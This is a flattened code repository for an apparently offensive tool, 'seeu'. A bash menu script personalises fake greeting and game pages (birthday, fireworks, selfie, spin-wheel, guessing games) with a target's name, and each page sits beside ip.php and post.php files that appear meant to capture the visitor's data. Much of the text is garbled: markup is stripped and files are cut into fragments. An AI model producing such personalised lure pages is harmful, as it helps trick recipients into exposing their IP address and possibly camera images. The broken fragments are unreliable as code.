├── LICENSE ├── README.md ├── seeu.sh └── webs ├── birthday ├── birthday.html ├── forward.php ├── ip.php └── post.php ├── book ├── book.html ├── forward.php ├── ip.php └── post.php ├── boxwish ├── boxwish.html ├── forward.php ├── ip.php └── post.php ├── firework ├── firework.html ├── forward.php ├── ip.php └── post.php ├── game ├── forward.php ├── game.html ├── ip.php └── post.php ├── guess ├── forward.php ├── guess.html ├── ip.php └── post.php ├── quiz ├── forward.php ├── ip.php ├── post.php └── quiz.html ├── rps ├── forward.php ├── ip.php ├── post.php └── rps.html ├── selfie ├── forward.php ├── ip.php ├── post.php └── selfie.html └── spinwheel ├── forward.php ├── ip.php ├── post.php └── spinwheel.html /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 N17R0 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
4 | 9 | 12 | 16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
97 |
98 |
99 |
$event
|" webs/$site/$site.html > option.html && mv option.html webs/$site 199 | sed "33s|\(.*\)|$msg
|" webs/$site/option.html > custom.html && mv custom.html webs/$site 200 | start 201 | fi 202 | } 203 | 204 | firework() { 205 | echo 206 | echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m " 207 | echo 208 | echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m" 209 | read selc 210 | if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]]; 211 | then 212 | site="firework" 213 | rm -rf webs/$site/option.html > /dev/null 2>&1 214 | start 215 | elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]]; 216 | then 217 | site="firework" 218 | rm -rf webs/$site/option.html > /dev/null 2>&1 219 | echo " " 220 | echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m" 221 | echo " " 222 | echo -e "\e[93mEvent Name: " 223 | read event 224 | echo -e "\e[93mPerson Name: " 225 | read msg 226 | echo 227 | echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m" 228 | sed "5s|\(.*\)|Happy Birthday
33 |My dear this is just for you.
34 |Hope your day goes great!
35 |Enter a guess from 1-100. Guess right to win a prize!
17 | 18 | 31 | 32 | 33 | 34 | 35 |Difficulty - Easy
16 |A steam-powered bot has challenged you to a game. Rock beats scissors, scissors beats paper, and paper beats rock.
6 |0 | 12 |0 | 13 |
You | 18 |Bot | 19 |
---|